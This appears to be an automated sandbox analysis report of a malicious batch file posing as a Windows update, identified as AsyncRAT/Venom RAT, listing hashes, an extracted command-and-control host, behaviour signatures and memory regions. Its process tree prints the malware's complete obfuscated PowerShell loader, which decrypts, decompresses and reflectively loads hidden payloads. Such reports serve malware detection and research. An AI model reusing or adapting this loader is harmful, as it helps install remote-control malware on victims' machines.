Analysis

  • max time kernel
    149s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-04-2024 07:49

General

  • Target

    windows_update/windows.cmd

  • Size

    109KB

  • MD5

    fb0037160a00b86b8418ca6efedbafdb

  • SHA1

    50cab1c16ab95af09fab1b3dbc8b0ee9960bce2e

  • SHA256

    15378788a250cc88796c95c360aea5f0fabd7ff540b68974c930e9907fde7810

  • SHA512

    07362a7b1d665477504cc177f1e208ccb8242a40b3aae6c213527a2baf04ba444584097dad034ffe3fc8eeb176d02125f99f23041840e66ed1fb990b7655e654

  • SSDEEP

    3072:JpGKToitW8Jc86cKdN18shPU54CEd3gO8mjxuWrMz:TTVtWWv6c+N18shH+OxfrMz

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

kdfsv.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 20 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:852
    • C:\Windows\system32\cmd.exe
      cmd /c \"set __=^&rem\
      2⤵
        PID:1484
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:452
        • C:\Windows\system32\cmd.exe
          cmd /c \"set __=^&rem\
          3⤵
            PID:4440
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "
            3⤵
              PID:4312
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              3⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3676
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3292

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orbceapg.1ev.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/3292-25-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
          Filesize

          10.8MB

        • memory/3292-29-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
          Filesize

          10.8MB

        • memory/3292-26-0x0000028E360B0000-0x0000028E360C0000-memory.dmp
          Filesize

          64KB

        • memory/3676-13-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
          Filesize

          64KB

        • memory/3676-32-0x00007FFD39950000-0x00007FFD39A0E000-memory.dmp
          Filesize

          760KB

        • memory/3676-14-0x000001C500000000-0x000001C500044000-memory.dmp
          Filesize

          272KB

        • memory/3676-15-0x000001C500050000-0x000001C5000C6000-memory.dmp
          Filesize

          472KB

        • memory/3676-11-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
          Filesize

          64KB

        • memory/3676-12-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
          Filesize

          64KB

        • memory/3676-10-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
          Filesize

          10.8MB

        • memory/3676-30-0x000001C498020000-0x000001C498034000-memory.dmp
          Filesize

          80KB

        • memory/3676-31-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
          Filesize

          2.0MB

        • memory/3676-0-0x000001C4FD590000-0x000001C4FD5B2000-memory.dmp
          Filesize

          136KB

        • memory/3676-33-0x000001C4982F0000-0x000001C498300000-memory.dmp
          Filesize

          64KB

        • memory/3676-34-0x000001C498300000-0x000001C498316000-memory.dmp
          Filesize

          88KB

        • memory/3676-35-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
          Filesize

          2.0MB

        • memory/3676-37-0x00007FFD1C5D0000-0x00007FFD1D091000-memory.dmp
          Filesize

          10.8MB

        • memory/3676-38-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
          Filesize

          64KB

        • memory/3676-39-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
          Filesize

          64KB

        • memory/3676-40-0x000001C4FDBC0000-0x000001C4FDBD0000-memory.dmp
          Filesize

          64KB

        • memory/3676-41-0x00007FFD3AA70000-0x00007FFD3AC65000-memory.dmp
          Filesize

          2.0MB